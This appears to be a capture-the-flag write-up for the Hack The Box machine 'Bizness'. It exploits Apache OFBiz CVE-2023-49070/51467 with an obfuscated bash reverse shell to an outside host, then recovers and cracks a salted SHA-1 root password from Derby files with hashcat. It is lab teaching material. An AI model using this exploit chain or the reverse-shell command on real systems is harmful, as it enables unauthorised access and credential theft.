Information Gathering

nmap scan: the usual ports are open, 22, 80, 443

dirsearch turns up a few routes (/content, /accounting, /control), but all of them redirect to the login page


The bottom right corner of the page shows the framework in use: Apache OFBiz, Release 18.12

A quick search turns up two vulnerabilities for this release (CVE-2023-49070 and CVE-2023-51467)

as well as a public exploit: https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass/blob/master/exploit.py

Exploitation

After downloading https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass/blob/master/exploit.py and https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar, run the following command

python3 exploit.py --url https://bizness.htb/ --cmd 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMjQvOTExMSAwPiYxCg==}|{base64,-d}|{bash,-i}'

# Here YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMjQvOTExMSAwPiYxCg== is the base64 encoding of 'bash -i >& /dev/tcp/10.10.14.124/9111 0>&1'
# In a second terminal, listen with: nc -lvnp 9111

This gives a reverse shell.

Privilege Escalation

Downloading and running linpeas.sh shows that Derby is present. Locating the related .dat files with find / -name "*.dat" leads to the directory /opt/ofbiz/runtime/data/derby/ofbiz/seg0, where the file contents can be searched for passwords:

grep -arion -E '(\w+\W+){0,5}password(\W+\w+){0,5}'

This yields a suspicious hash: $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

This is a SHA1 hash with salt d; the digest is URL-safe base64, so replace _ with / and - with + before decoding.

Converting it from base64 to hex in CyberChef gives b8fd3f41a541a435857a8f3e751cc3a91c174362

Next, crack it with hashcat. The hash file contains: b8fd3f41a541a435857a8f3e751cc3a91c174362:d

hashcat -m 120 -a 0 hash /usr/share/wordlists/rockyou.txt

Result: the password is monkeybizness

b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 120 (sha1($salt.$pass))
Hash.Target......: b8fd3f41a541a435857a8f3e751cc3a91c174362:d
Time.Started.....: Thu Jan 11 23:10:55 2024 (13 secs)
Time.Estimated...: Thu Jan 11 23:11:08 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3346.2 kH/s (0.09ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1478656/14344385 (10.31%)
Rejected.........: 0/1478656 (0.00%)
Restore.Point....: 1477632/14344385 (10.30%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: montano13 -> monkey-moo
Hardware.Mon.#1..: Util: 43%
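As an added example (not part of the original writeup), the Python below automates the manual steps above: it parses OFBiz's $SHA$salt$digest format, decodes the URL-safe base64 digest to the hex that CyberChef produced, and verifies a candidate the way OFBiz does (SHA-1 over salt then password), which is exactly the sha1($salt.$pass) construction hashcat mode 120 targets. Only the SHA (SHA-1) type appears on the page; the other type names in the mapping are assumed from Java MessageDigest naming.

```python
import base64
import hashlib
import hmac

# Value recovered from the Derby .dat files in the writeup above.
STORED_HASH = "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"

# OFBiz type names follow Java MessageDigest names; "SHA" means SHA-1.
# Only "SHA" is seen on this page; the others are assumed for completeness.
HASH_TYPES = {"SHA": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def parse_ofbiz_hash(value):
    """Split OFBiz's '$<type>$<salt>$<digest>' string into its parts.

    The digest is URL-safe base64 without padding, so '-' and '_' stand
    in for '+' and '/'; that is the character swap done by hand above.
    """
    _, hash_type, salt, digest_b64 = value.split("$", 3)
    padded = digest_b64 + "=" * (-len(digest_b64) % 4)
    return hash_type, salt, base64.urlsafe_b64decode(padded)


def verify_ofbiz_password(value, candidate):
    """Recompute hash(salt || password), the order OFBiz uses, and compare
    in constant time. A single unstretched SHA-1 round with a one-byte
    salt is why a wordlist attack finishes in seconds."""
    hash_type, salt, digest = parse_ofbiz_hash(value)
    h = hashlib.new(HASH_TYPES.get(hash_type, hash_type.lower()))
    h.update(salt.encode("utf-8"))
    h.update(candidate.encode("utf-8"))
    return hmac.compare_digest(h.digest(), digest)


def to_hashcat_line(value):
    """Render the stored value as 'hexdigest:salt', the hash-file format
    used with hashcat -m 120 above."""
    _, salt, digest = parse_ofbiz_hash(value)
    return f"{digest.hex()}:{salt}"


if __name__ == "__main__":
    print(to_hashcat_line(STORED_HASH))
    print(verify_ofbiz_password(STORED_HASH, "monkeybizness"))
```

For a defender, the same check is a quick audit of any OFBiz credential store: if verify_ofbiz_password succeeds against a wordlist entry, the account needs a reset and the instance a stronger configured hash type.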

su to root with the password monkeybizness, and privilege escalation is complete.
